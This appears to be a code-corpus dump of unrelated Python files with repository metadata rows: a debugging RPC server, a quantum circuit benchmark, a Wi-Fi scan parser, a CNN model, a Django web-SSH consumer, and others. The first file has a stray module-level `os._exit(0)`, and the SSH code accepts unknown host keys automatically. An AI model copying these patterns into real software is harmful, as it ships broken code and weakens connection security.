            default_port = DEFAULT_SERVER_SSL_PORT
        else:
            self.authenticator = None
            default_port = DEFAULT_SERVER_PORT
        if self.port is None:
            self.port = default_port
        setup_logger(self.quiet, self.logfile)
        sys.stdout.write(
            BANNER + " starting at %s %s\n" %
            (self.host, self.port))
        sys.stdout.flush()
        # WeirdServer sets done_event once both expected clients connect.
        done_event = threading.Event()
        srv = WeirdServer(
            SlaveService,
            done_event,
            hostname=self.host,
            port=self.port,
            reuse_addr=True,
            ipv6=self.ipv6,
            authenticator=self.authenticator,
            registrar=self.registrar,
            auto_register=self.auto_register)
        t = threading.Thread(target=self._serve, args=[srv])
        t.start()
        # wait for 2 connections
        done_event.wait()
        IPython.embed(
            banner1=BANNER + " client connected\n",
            banner2="",  # "tip: call serve_all() on the client to have a full working shell here.",
            exit_msg=BANNER + " shell closed.\nexiting...\n"
        )
        # Shell closed: kill the forked client process and exit hard.
        os.kill(srv.proc, signal.SIGKILL)
        os._exit(0)

    def _serve(self, srv):
        # Runs in a background thread; exits the whole process when the
        # server stops (i.e. a client disconnected).
        srv.start()
        sys.stdout.write("\n" + BANNER + " client disconnected.\nexiting...\n")
        os._exit(0)
os._exit(0)
def main():
    """Console entry point: run the AngrDbgServer CLI application."""
    AngrDbgServer.run()
'''simple client
import rpyc
import thread
conn1 = rpyc.classic.connect("localhost")
conn2 = rpyc.classic.connect("localhost")
thread.start_new_thread(conn2.serve_all, tuple())
'''
| [
"andreafioraldi@gmail.com"
] | andreafioraldi@gmail.com |
ec6fcf9d5ab20c814125e6ac6e0b78fc36051033 | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/p4VQE/R1/benchmark/startPyquil196.py | 6360a951c9bd056e2dd8006aa958ef69a2c7c95e | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,184 | py | # qubit number=4
# total number=12
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
    """Build the fixed 4-qubit pyquil benchmark program (12 gates total;
    the '# number=N' comments are generator bookkeeping)."""
    prog = Program()  # circuit begin
    prog += H(0) # number=1
    prog += H(1) # number=2
    prog += H(2) # number=3
    prog += H(3) # number=4
    prog += CNOT(2,0) # number=5
    prog += H(0) # number=9
    prog += CZ(2,0) # number=10
    prog += H(0) # number=11
    prog += X(3) # number=7
    prog += X(3) # number=8
    # circuit end
    return prog
def summrise_results(bitstrings) -> dict:
    """Count occurrences of each measured bitstring.

    Parameters
    ----------
    bitstrings : iterable of str
        One measurement outcome per shot, e.g. '0101'.

    Returns
    -------
    dict
        Mapping from bitstring to the number of shots that produced it.
    """
    counts = {}
    for outcome in bitstrings:
        # dict.get with a default replaces the explicit None check.
        counts[outcome] = counts.get(outcome, 0) + 1
    return counts
if __name__ == '__main__':
    prog = make_circuit()
    # Run 1024 shots on a 4-qubit QVM.
    qvm = get_qc('4q-qvm')
    results = qvm.run_and_measure(prog,1024)
    # Rows = shots, columns = qubits; join each row into a bitstring.
    bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
    bitstrings = [''.join(map(str, l)) for l in bitstrings]
    # Write the {bitstring: count} summary as the CSV file's only line.
    writefile = open("../data/startPyquil196.csv","w")
    print(summrise_results(bitstrings),file=writefile)
    writefile.close()
| [
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
f7a36f223a0156d961c0da7655c5e5540947867f | 01efdeb528f753779da7a5c42d9ee47a063c9c9b | /tests/test_basic.py | f715b7a5eadb8af7edda0af1e5732c76618605bb | [
"MIT"
] | permissive | mustafakisacik/Deep-Learning-Training-GUI | 4b57ec3552e9adde07b5c3f98f2132bdbdcfc803 | 1992185fd18e768f30c5bb5edd08ea709be97b09 | refs/heads/master | 2020-12-23T22:47:16.476812 | 2020-01-29T01:22:46 | 2020-01-29T01:22:46 | 237,299,544 | 1 | 0 | MIT | 2020-01-30T20:29:44 | 2020-01-30T20:29:43 | null | UTF-8 | Python | false | false | 951 | py | import os
import numpy as np
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from multiprocessing import Process
def startTensorboard(logdir):
    """Launch TensorBoard on ``logdir`` via a blocking shell call.

    os.system blocks until TensorBoard exits, which is why the caller
    runs this inside a separate multiprocessing.Process.
    """
    # Start tensorboard with system call
    os.system("tensorboard --logdir {}".format(logdir))
def fitModel():
    """Train a tiny Keras model on random data — a demo workload to run
    alongside the TensorBoard process."""
    # Create your model
    model = Sequential()
    model.add(Dense(32, activation='relu', input_dim=100))
    model.add(Dense(1, activation='sigmoid'))
    model.compile(optimizer='rmsprop',
                  loss='binary_crossentropy',
                  metrics=['accuracy'])
    # Some mock training data
    data = np.random.random((1000, 100))
    labels = np.random.randint(2, size=(1000, 1))
    # Run the fit function
    model.fit(data, labels, epochs=100, batch_size=32)
if __name__ == '__main__':
    # Run both processes simultaneously: TensorBoard serving 'logs'
    # and the training loop feeding it.
    Process(target=startTensorboard, args=("logs",)).start()
    Process(target=fitModel).start()
"tunalimustafamertt@gmail.com"
] | tunalimustafamertt@gmail.com |
76c5ed4159bd3cb355438ca8e76e93487fef1c31 | 0cc4d72bb2ad652eb0b5582af1559cacbd30f1c7 | /scripts/wifi_scan/wifi_scan.py | 0fb43ff607d4c951391151cd04913e6589ac8368 | [] | no_license | akrias/projects | ac4599983bfd0119a92b03f7021ffdfa80b238f8 | 5daa4720141d41f848e2edb83dc238078f1392f2 | refs/heads/master | 2020-03-30T18:14:43.660331 | 2018-10-16T06:00:54 | 2018-10-16T06:00:54 | 151,490,501 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,112 | py | #/usr/bin/python
import re
import subprocess
import datetime
import pprint
import json
import collections
import csv
class Cell(object):
    """A single cell (AP) entry parsed from ``iwlist <iface> scanning`` output.

    Each ``get_*`` helper matches one stripped line of iwlist output and
    returns the extracted value as a string, or None when the line does not
    match, so ``parse`` can dispatch on which pattern matched. (Previously
    the helpers mixed ''/None/'Closed' fallbacks, which broke the
    ``is not None`` dispatch in ``parse``.)
    """

    def get_essid(self, line):
        """Return the network name from an ``ESSID:"..."`` line, else None.

        A hidden network yields the empty string '' (still a match).
        """
        match = re.search(r"^ESSID\:\"(?P<essid>.*)\"$", line)
        return match.group('essid') if match else None

    def get_mac(self, line):
        """Return the MAC from a ``Cell NN - Address: ...`` line, else None."""
        match = re.search(r"^Cell\s+(?P<cell>.*)\s+\-\s+Address\:\s+(?P<mac>.*)$", line)
        return match.group('mac') if match else None

    def get_frequency(self, line):
        """Return the band in GHz (string) from a ``Frequency:...`` line, else None."""
        match = re.search(r"^Frequency\:(?P<frequency>[\d.]+)", line)
        return match.group('frequency') if match else None

    def get_channel(self, line):
        """Return the channel number (string) from a ``Channel:NN`` line, else None."""
        match = re.search(r"^Channel\:(?P<channel>\d+)$", line)
        return match.group('channel') if match else None

    def get_quality(self, line):
        """Return signal quality as a percentage string (e.g. '57.14'), else None."""
        match = re.search(
            r"^Quality=(?P<signal_level>\d+)/(?P<signal_total>\d+)\s+Signal level=(?P<db>.*)$",
            line)
        if match is None:
            return None
        level = float(match.group('signal_level'))
        total = float(match.group('signal_total'))
        # Convert the level/total fraction to a two-decimal percent string.
        return format(100 * (level / total), '.2f')

    def get_encryption(self, line):
        """Return 'Open'/'Closed' from an ``Encryption key:...`` line, else None.

        'off' means an open network; any other value is treated as closed.
        """
        match = re.search(r"^Encryption key\:(?P<encryption>.*)$", line)
        if match is None:
            return None
        return "Open" if match.group('encryption') == "off" else "Closed"

    def call_iwlist(self, interface="wlan0"):
        """Run ``iwlist <interface> scanning`` and return its stdout.

        NOTE(review): on Python 3 this returns bytes — decode before
        passing to parse(); confirm the target interpreter.
        """
        p = subprocess.Popen(['iwlist', interface, 'scanning'],
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        return p.stdout.read()

    def get_timestamp(self, line):
        """Return the current timestamp for a new ``Cell NN - ...`` line, else None."""
        if re.search(r"^Cell\s+(?P<cell>.*)\s+\-.*", line) is not None:
            return '{:%Y-%m-%d %H:%M:%S}'.format(datetime.datetime.now())
        return None

    def parse(self, iwlist_content):
        """Parse raw iwlist output into ``{mac: {field: value}}``.

        Also mirrors every record to 'test.csv' in the current directory;
        iwlist emits fields in the CSV header's column order, with ESSID
        last (it terminates each CSV row).
        """
        f = open("test.csv", "w")
        f.write("mac,timestamp,channel,frequency,quality,encryption,essid\n")
        dic = {}
        tmp_mac = ""  # MAC of the AP entry currently being filled in
        for raw_line in iwlist_content.split('\n'):
            line = raw_line.strip()
            mac = self.get_mac(line)
            if mac is not None:
                # New AP entry: open a dict and a CSV row for it.
                timestamp = self.get_timestamp(line)
                dic[mac] = {'mac': mac, 'timestamp': timestamp}
                tmp_mac = mac
                f.write(mac + "," + timestamp + ",")
                continue
            channel = self.get_channel(line)
            if channel is not None:
                dic[tmp_mac]['channel'] = channel
                f.write(channel + ",")
                continue
            frequency = self.get_frequency(line)
            if frequency is not None:
                dic[tmp_mac]['frequency'] = frequency
                f.write(frequency + ",")
                continue
            essid = self.get_essid(line)
            if essid is not None:
                dic[tmp_mac]['essid'] = essid
                f.write(essid + "\n")  # ESSID terminates the CSV row
                continue
            quality = self.get_quality(line)
            if quality is not None:
                dic[tmp_mac]['quality'] = quality
                f.write(quality + ",")
                continue
            encryption = self.get_encryption(line)
            if encryption is not None:
                dic[tmp_mac]['encryption'] = encryption
                f.write(encryption + ",")
        f.close()
        return dic

    def output(self, dic):
        """Pretty-print the parsed dictionary to the console."""
        pprint.pprint(dic)

    def to_json(self, dic):
        """Dump the parsed dictionary to 'scan_data.json' as JSON."""
        # 'w' (text) instead of 'wb': json.dump writes str, and text mode
        # works on both Python 2 and 3.
        with open('scan_data.json', 'w') as fp:
            json.dump(dic, fp)
# ********** main **********
# Scan with the default interface, parse, and emit JSON + console output.
asdf = Cell()
content = asdf.call_iwlist()
dic = asdf.parse(content)
asdf.to_json(dic)
asdf.output(dic)
| [
"locochocobo@gmail.com"
] | locochocobo@gmail.com |
f52cf9bd2c80065883c364bb502ee21046300949 | 81818932624d88c87deee1017605835b271e88ca | /model.py | eda1de54f6140821b9035ed90ac594d5c153b99d | [] | no_license | Seojin-Kim/Stock-prediction | 3d11d3f5edf9a6898d94552dd19af9ee60dde8b4 | 81634c4529d2946759a4358b527a80a1d9233c2b | refs/heads/main | 2023-03-09T12:32:01.148327 | 2021-02-18T08:13:31 | 2021-02-18T08:13:31 | 339,967,911 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,679 | py | import torch.nn as nn
import torch.nn.functional as F
import torch
# Layer specs: ints are Conv1d output channel counts, 'M' is a 2x max-pool.
cfg = {
    'VGG11': [64, 'M', 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
    'VGG13': [64, 64, 'M', 128, 128, 'M', 256, 256, 'M', 512, 512, 'M', 512, 512, 'M'],
    'VGG16': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M'],
    'VGG19': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 256, 'M', 512, 512, 512, 512, 'M', 512, 512, 512, 512, 'M'],
    'SJ20_1': [32, 32, 'M', 32, 32, 'M'],
    'SJ20_2': [64, 64, 'M', 128, 128, 'M', 128, 128, 'M'],
}


class CNN(nn.Module):
    """1-D CNN with one classification head per group of 5 input channels.

    Parameters
    ----------
    model_code : str
        Key into ``cfg`` selecting the conv/pool layer layout.
    in_channels : int
        Number of input channels; ``in_channels // 5`` heads are created.
    out_dim : int
        Number of classes per head.
    act : str
        'relu', 'sigmoid' or 'tanh'.
    use_bn : bool
        Insert BatchNorm1d after each convolution.

    forward() returns log-probabilities of shape
    ``(batch, out_dim, in_channels // 5)``. The flattened conv output must
    be 512 features (e.g. input length 64 for 'SJ20_1'), matching the
    Linear(512, out_dim) heads.
    """

    def __init__(self, model_code, in_channels, out_dim, act, use_bn):
        super(CNN, self).__init__()
        if act == 'relu':
            self.act = nn.ReLU()
        elif act == 'sigmoid':
            self.act = nn.Sigmoid()
        elif act == 'tanh':
            # BUG FIX: was nn.TanH(), which does not exist in torch.nn and
            # raised AttributeError whenever act == 'tanh'.
            self.act = nn.Tanh()
        else:
            raise ValueError("Not a valid activation function code")
        self.size = in_channels // 5  # number of independent output heads
        self.layers = self._make_layers(model_code, in_channels, use_bn)
        # One linear head (512 -> out_dim) per group of 5 input channels.
        self.classifier = nn.ModuleList(
            [nn.Sequential(nn.Linear(512, out_dim)) for _ in range(self.size)])

    def forward(self, x):
        x = self.layers(x)
        x = x.view(x.size(0), -1)
        # Stack each head's log-softmax along a new trailing axis; a single
        # torch.cat replaces the original grow-by-cat loop.
        outs = [F.log_softmax(head(x), dim=1).unsqueeze(2)
                for head in self.classifier]
        return torch.cat(outs, dim=2)

    def _make_layers(self, model_code, in_channels, use_bn):
        """Build the conv/pool feature extractor described by cfg[model_code]."""
        layers = []
        for spec in cfg[model_code]:
            if spec == 'M':
                layers += [nn.MaxPool1d(kernel_size=2, stride=2)]
            else:
                layers += [nn.Conv1d(in_channels=in_channels,
                                     out_channels=spec,
                                     kernel_size=3,
                                     stride=1,
                                     padding=1)]
                if use_bn:
                    layers += [nn.BatchNorm1d(spec)]
                layers += [self.act]
                in_channels = spec
        return nn.Sequential(*layers)
| [
"osikjs@kaist.ac.kr"
] | osikjs@kaist.ac.kr |
7b2597ce1e9e6e6daf8d7e56fa0a8b36ae2c662e | 69e9c901d7be385372e05eede55bd50fab72d4d4 | /HLLHC/v0prep/plotMySusySignal.py | 0824473501bb6182cccb3f02c23e205bc1e5261f | [] | no_license | conniemiao/stopSUSY | bad5cac63a433ad75cb66079f49ef1d6ce780e50 | 399915d1fc26055552501473ea1aa4a275c81d41 | refs/heads/master | 2020-05-29T18:35:20.073391 | 2020-01-06T04:47:10 | 2020-01-06T04:47:10 | 189,304,802 | 0 | 1 | null | 2019-12-01T22:47:30 | 2019-05-29T21:59:28 | Python | UTF-8 | Python | false | false | 2,196 | py | # plots a variable from a root file outputted by makeSusySignalRoot.py
from ROOT import TFile, TTree, TH1D, TCanvas, TLorentzVector
import numpy as np
# Plot one branch of a ROOT tree produced by makeSusySignalRoot.py.
# (Python 2 — note the bare print statements and raw_input below.)
# filename = "Stop_175_LSP1_small"
# inFile = TFile.Open("selectedMuEl_" + filename + ".root")
# plotVar = "nbtag" # **** change this line
filename = "/eos/user/a/alkaloge/HLLHC/Skims/v2/SingleStop/single-stop14TeV_R_220_A.root"
inFile = TFile.Open(filename)
plotVar = "muon_px" # **** change this line
# Per-variable histogram binning.
plotSettings = { #[nBins,xMin,xMax]
        "muon_pt":[100,0,3],
        "muon_phi":[100,-4,4],
        "muon_eta":[100,-3,3],
        "muon_px":[100,-150,150],
        "muon_py":[100,-150,150],
        "muon_pz":[100,-450,350],
        "muon_charge":[100,-1.5,1.5],
        "muon_relIso":[100,0,0.35],
        "electron_pt":[100,0,130],
        "electron_phi":[100,-4,4],
        "electron_eta":[100,-4,4],
        "electron_px":[100,-120,120],
        "electron_pz":[100,-300,200],
        "electron_charge":[100,-1,1],
        "electron_relIso":[100,0,0.35],
        # "njets":[10,0,10],
        # "nbtag":[3,0,3],
        # "nbtagTight":[2,0,2],
        "pfmet_corr_x":[100,-350,500],
        "pfmet_corr_y":[100,-250,350],
        "primvertex_count":[35,0,35],
        "genweight":[100,2.980,2.995],
        "mtmu":[100,0,350],
        "mtel":[100,0,300]
        }
nBins = plotSettings[plotVar][0]
xMin = plotSettings[plotVar][1]
xMax = plotSettings[plotVar][2]
print "Plotting", plotVar, "from", filename
# inTree = inFile.Get("t")
inTree = inFile.Get("AC1B")
nentries = inTree.GetEntries()
print("nentries={0:d}".format(nentries))
nMax = nentries
# nMax = 5000
count = 0
verbose = 0
hist = TH1D(plotVar, plotVar, nBins, xMin, xMax)
# Fill the histogram with the leading (first) value of the branch per event.
for entry in inTree :
    if count > nMax : break
    if verbose > 1 or (count % 5000 == 0) : print("count={0:d}".format(count))
    count += 1
    # hist.Fill(entry.muon_px) # **** change this line
    val = list(entry.muon_px)
    if len(val)>0: hist.Fill(val[0],1) # **** change this line
# Draw and keep the canvas open until the user presses enter.
c1 = TCanvas("c1","Plot",200,50,1000,700)
hist.GetXaxis().SetTitle(plotVar + " (GeV)")
hist.GetYaxis().SetTitle("Number of Events")
hist.Draw()
c1.Update()
print "Press enter to finish."
raw_input()
| [
"conniem@princeton.edu"
] | conniem@princeton.edu |
ce6c75187338f6411561b65cbd6813d6ec815c50 | ad512372f62e4600ac3983e1e679fac67aa0e986 | /classes/classes/main.py | 30ad7d0f7b416fb9f7eba8cb0ed1ffd0869d9e79 | [] | no_license | jasonis/DPfWP | d83d1357da242247cdef851af4a475293bbee7b7 | 73eed9332daa405f4d2f9434140c6ebce485e81d | refs/heads/master | 2020-05-13T17:36:31.086585 | 2014-08-29T00:11:19 | 2014-08-29T00:11:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,348 | py | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import webapp2
class MainHandler(webapp2.RequestHandler):
    """GET handler demonstrating the Button class (labels both instances,
    but only shows the first one's label)."""
    def get(self):
        about_button = Button()
        about_button.label = "about us"
        about_button.show_label()
        contact_button = Button()
        contact_button.label = "contact us"
class Button(object):
    """Toy UI button illustrating attributes and methods (Python 2 print
    syntax throughout)."""
    def __init__(self):
        self.label = '' # public attribute
        self.__size = 60          # name-mangled, effectively private
        self.color = '0x000000'
        self.click()              # NOTE(review): clicks itself on construction
        #self.on_roll_over("hello!!")
    def click(self):
        print "I've been clicked"
    def on_roll_over(self, message):
        # NOTE(review): `message` is accepted but never used.
        print "You've rolled over my button"
    def show_label(self):
        # NOTE(review): no space after "is" in the output.
        print "my label is" + self.label
# WSGI application routing '/' to MainHandler.
app = webapp2.WSGIApplication([
    ('/', MainHandler)
], debug=True)
| [
"jislocum78@gmail.com"
] | jislocum78@gmail.com |
a2a54db18153e09c2bdd4306052b808031bbdae2 | eba5e5ff22bcba73001fba729218c02cd257759f | /assets/utils/webssh.py | 2cb35bc81b8a867099b45e74389da231bd5cb930 | [] | no_license | duoyichen/Ops-1 | d04ea66aa37c0732ddeff08889819d8ca830985e | 56d3838a40dc0644a0fe8e58f40be421eaddc693 | refs/heads/master | 2020-04-29T11:48:34.329401 | 2019-03-14T10:29:38 | 2019-03-14T10:29:38 | 166,679,958 | 0 | 1 | null | 2019-01-20T15:59:18 | 2019-01-20T15:59:18 | null | UTF-8 | Python | false | false | 5,155 | py | # -*- coding: utf-8 -*-
import paramiko
import threading
import time
import os
import logging
from socket import timeout
from assets.tasks import admin_file
from channels.generic.websocket import WebsocketConsumer
from assets.models import ServerAssets, AdminRecord
from django.conf import settings
from utils.crypt_pwd import CryptPwd
class MyThread(threading.Thread):
    """Reader thread: pumps bytes from the paramiko channel to the
    websocket and accumulates them as asciinema-v2 cast events for the
    session recording."""

    def __init__(self, chan):
        super(MyThread, self).__init__()
        self.chan = chan                      # the owning SSHConsumer
        self._stop_event = threading.Event()
        self.start_time = time.time()
        self.current_time = time.strftime(settings.TIME_FORMAT)
        self.stdout = []                      # [elapsed, 'o', data] cast events
        self.read_lock = threading.RLock()

    def stop(self):
        # Ask the run() loop to exit at its next iteration.
        self._stop_event.set()

    def run(self):
        with self.read_lock:
            while not self._stop_event.is_set():
                time.sleep(0.1)
                try:
                    data = self.chan.chan.recv(1024)
                    if data:
                        str_data = bytes.decode(data)
                        # Mirror shell output to the browser and the recording.
                        self.chan.send(str_data)
                        self.stdout.append([time.time() - self.start_time, 'o', str_data])
                except timeout:
                    # Channel idle timeout (set in SSHConsumer.connect).
                    break
            # NOTE(review): this idle-disconnect message is also sent when
            # stop() ends the loop, not only on timeout — confirm intended.
            self.chan.send('\n由于长时间没有操作,连接已断开!')
            self.stdout.append([time.time() - self.start_time, 'o', '\n由于长时间没有操作,连接已断开!'])
            self.chan.close()

    def record(self):
        """Persist the cast file (via the admin_file task) and store an
        AdminRecord row describing the session."""
        record_path = os.path.join(settings.MEDIA_ROOT, 'admin_ssh_records', self.chan.scope['user'].username,
                                   time.strftime('%Y-%m-%d'))
        if not os.path.exists(record_path):
            os.makedirs(record_path, exist_ok=True)
        record_file_name = '{}.{}.cast'.format(self.chan.host_ip, time.strftime('%Y%m%d%H%M%S'))
        record_file_path = os.path.join(record_path, record_file_name)
        # asciinema v2 header.
        header = {
            "version": 2,
            "width": self.chan.width,
            "height": self.chan.height,
            "timestamp": round(self.start_time),
            "title": "Demo",
            "env": {
                "TERM": os.environ.get('TERM'),
                "SHELL": os.environ.get('SHELL', '/bin/bash')
            },
        }
        # Write the cast file asynchronously (celery task).
        admin_file.delay(record_file_path, self.stdout, header)
        # Human-readable session duration.
        # NOTE(review): the >= 3600 branch is unreachable (>= 60 matches
        # first) and divides by 3660 — looks like a typo for 3600.
        login_status_time = time.time() - self.start_time
        if login_status_time >= 60:
            login_status_time = '{} m'.format(round(login_status_time / 60, 2))
        elif login_status_time >= 3600:
            login_status_time = '{} h'.format(round(login_status_time / 3660, 2))
        else:
            login_status_time = '{} s'.format(round(login_status_time))
        try:
            AdminRecord.objects.create(
                admin_login_user=self.chan.scope['user'],
                admin_server=self.chan.host_ip,
                admin_remote_ip=self.chan.remote_ip,
                admin_start_time=self.current_time,
                admin_login_status_time=login_status_time,
                admin_record_file=record_file_path.split('media/')[1]
            )
        except Exception as e:
            logging.getLogger().error('数据库添加用户操作记录失败,原因:{}'.format(e))
class SSHConsumer(WebsocketConsumer):
    """Django-Channels websocket consumer bridging a browser terminal to
    an SSH session on the selected server via paramiko."""

    def __init__(self, *args, **kwargs):
        super(SSHConsumer, self).__init__(*args, **kwargs)
        self.ssh = paramiko.SSHClient()
        self.group_name = self.scope['url_route']['kwargs']['group_name']
        # The target server id is embedded in the websocket path.
        self.server = ServerAssets.objects.select_related('assets').get(id=self.scope['path'].split('/')[3])
        self.host_ip = self.server.assets.asset_management_ip
        self.width = 150   # pty size, also recorded in the cast header
        self.height = 30
        self.t1 = MyThread(self)
        self.remote_ip = self.scope['query_string'].decode('utf8')
        self.chan = None   # paramiko channel, created in connect()

    def connect(self):
        self.accept()
        username = self.server.username
        try:
            self.ssh.load_system_host_keys()
            self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            self.ssh.connect(self.host_ip, int(self.server.port), username,
                             CryptPwd().decrypt_pwd(self.server.password), timeout=5)
        except Exception as e:
            # Report the failure to both the log and the browser terminal.
            logging.getLogger().error('用户{}通过webssh连接{}失败!原因:{}'.format(username, self.host_ip, e))
            self.send('用户{}通过webssh连接{}失败!原因:{}'.format(username, self.host_ip, e))
            self.close()
        self.chan = self.ssh.invoke_shell(term='xterm', width=self.width, height=self.height)
        # Drop the connection after 3 minutes without any input.
        self.chan.settimeout(60 * 3)
        self.t1.setDaemon(True)
        self.t1.start()

    def receive(self, text_data=None, bytes_data=None):
        # Forward keystrokes from the browser straight to the shell.
        self.chan.send(text_data)

    def disconnect(self, close_code):
        try:
            # Persist the session recording before tearing down.
            self.t1.record()
        finally:
            self.ssh.close()
            self.t1.stop()
| [
"zm_world@163.com"
] | zm_world@163.com |
ddb68500430e1a0792d20c343f07dfe6036636d3 | 8c14e2b39554caea82e57d53d082d3325efe1e68 | /HelloWorld/search.py | 7d0a7d7b0c090c852141dd33157ea2e18e9beb1e | [] | no_license | BoyOoka/HelloWorld | 098a83f2c01f1aa15d3dc57781b2c3bf37e37cc1 | fd7ae739105921428dade787dd6d3ddf4bd18841 | refs/heads/master | 2020-06-03T12:09:04.360649 | 2019-06-12T11:55:28 | 2019-06-12T11:55:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 757 | py | # -*- coding: utf-8 -*-
from django.http import HttpResponse
from django.shortcuts import render_to_response, render
# from django
# 表单
def search_form(request):
    """Render the empty search form page."""
    return render(request, 'search_form.html')
# 接收请求数据
def search_get(request):
    """Handle the GET search request and echo the submitted query.

    Uses QueryDict.get() so a request without a 'q' parameter is treated
    as an empty form instead of raising MultiValueDictKeyError (HTTP 500),
    which the original ``request.GET['q']`` did.
    """
    request.encoding = 'utf-8'
    q = request.GET.get('q')
    if q:
        message = '你搜索的内容为:' + q
    else:
        message = '你提交了空表单'
    return HttpResponse(message)
def search_post(request):
    """Handle the POST search request and echo the submitted content.

    Uses QueryDict.get() so a request without a 'q' parameter is treated
    as empty content instead of raising MultiValueDictKeyError (HTTP 500),
    which the original ``request.POST['q']`` did.
    """
    q = request.POST.get('q')
    if q:
        message = '你提交的内容为:' + q
    else:
        message = '你提交了空内容'
    return HttpResponse(message)
| [
"pengyihao@baie.com.cn"
] | pengyihao@baie.com.cn |
e20f8797206e7caf8dcf0cf85d87da67831b181e | 22ad0c489d4ee8b1905e913cc4668a97756ad005 | /q5.py | 520f0379a35e3668e8de5023d2344f75c5738a3b | [] | no_license | semihPy/Class4-Exam | e2e507b8c3e57aa71785fe197c65b5bfb22e1c59 | 87f1713c58bcdf7e9e8e2a95c9d6dc52720abded | refs/heads/main | 2023-03-25T01:02:09.426299 | 2021-03-27T21:53:46 | 2021-03-27T21:53:46 | 352,060,145 | 0 | 0 | null | 2021-03-27T11:52:21 | 2021-03-27T11:52:21 | null | UTF-8 | Python | false | false | 496 | py |
# Input ile girilen bir cumledeki sayilarin ve harflerin miktarini hesaplayan bir fonksiyon yaziniz.
# Ornek input: hello world! 123
# Output:
# HARFLER: 10
# SAYILAR: 3
def count_letters_digits(text):
    """Return ``(letters, digits)``: counts of alphabetic and numeric characters in *text*."""
    letters = sum(1 for ch in text if ch.isalpha())
    digits = sum(1 for ch in text if ch.isdigit())
    return letters, digits


def myfunc():
    """Read a line from the user and print how many letters and digits it contains.

    Example: "hello world! 123" -> HARFLER: 10 / SAYILAR: 3

    Bug fixed: the original split the input on spaces and counted the full
    length of every non-numeric token, so punctuation (e.g. '!') was counted
    as a letter — the documented example would have printed 11 instead of 10.
    Characters are now classified individually with isalpha()/isdigit().
    """
    text = input("string ve sayi giriniz:")
    letters, digits = count_letters_digits(text)
    print('HARFLER:', letters)
    print('SAYILAR:', digits)


if __name__ == '__main__':
    # Guarded so importing this module (e.g. from tests) does not block on input().
    myfunc()
"noreply@github.com"
] | noreply@github.com |
303b6774137255febbbd1b27906dd550026a4999 | 88287768bd23da62adea05ba61341e44d6e6db41 | /commandable/command_loader.py | 8e57671357a3114ced6ad66f000ad514cab3904f | [
"Apache-2.0"
] | permissive | newcraftgroup/nci-python-commands | ac7d5746633c10d2525aa26339dd35230a07f37e | 8ccdc9251c16305dea54159028ec245dc91a4339 | refs/heads/master | 2021-01-19T05:19:04.823362 | 2019-01-28T10:05:50 | 2019-01-28T10:05:50 | 100,577,546 | 1 | 1 | Apache-2.0 | 2019-01-28T10:05:55 | 2017-08-17T07:59:08 | Python | UTF-8 | Python | false | false | 3,677 | py | # Copyright 2017 NEWCRAFT GROUP B.V.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import sys
import os
import importlib
from modulefinder import Module
from commandable.command import Command
from commandable.commands.help import Help
class CommandLoader:
    """
    A basic command loader.

    Resolves the command name given on the command line (argv[1]) to a module
    inside one of the registered namespaces, instantiates the class named
    after it and runs it.  Dispatch happens eagerly in the constructor.

    Parameters
    ----------
    namespaces: list
        A list of namespaces to accept commands from
    arguments: dict, optional
        The arguments to pass on to the command
    """

    def __init__(self, namespaces=None, arguments=None):
        if namespaces is None:
            namespaces = []
        # A single namespace string is also accepted for convenience.
        if isinstance(namespaces, str):
            namespaces = [namespaces]
        # The built-in commands (e.g. "help") are always available as a fallback.
        namespaces += ["commandable.commands"]
        self.arguments = arguments or sys.argv[:]
        self.prog_name = os.path.basename(self.arguments[0])
        # argv[1] selects the command; default to the help command.
        self.command = self.arguments[1] if len(self.arguments) > 1 else "help"
        self.namespaces = namespaces
        # Everything after the command name is forwarded to the command itself.
        self.arguments = self.arguments[2:]
        self.execute(self.command)

    def execute(self, name):
        """
        Run the first command called *name* found in the registered namespaces.

        Parameters
        ----------
        name : str
            The command to execute
        """
        namespaces = self.namespaces[:]
        instance = None
        # Namespaces are tried from the END of the list (list.pop()), so the
        # built-in "commandable.commands" namespace — appended last — wins first.
        while len(namespaces) > 0:
            instance = self.load_command(name, namespaces.pop())
            if instance is not None:
                break
        if instance is None:
            # Unknown command: fall back to the built-in help command and tell
            # it which name the user originally asked for.
            self.load_command("help", "commandable.commands", called=name)

    @staticmethod
    def to_camelcase(name):
        """
        Parameters
        ----------
        name : str
            The string to convert to camelcase formatting

        Returns
        -------
        str
            Converted name string from underscore to camel case
        """
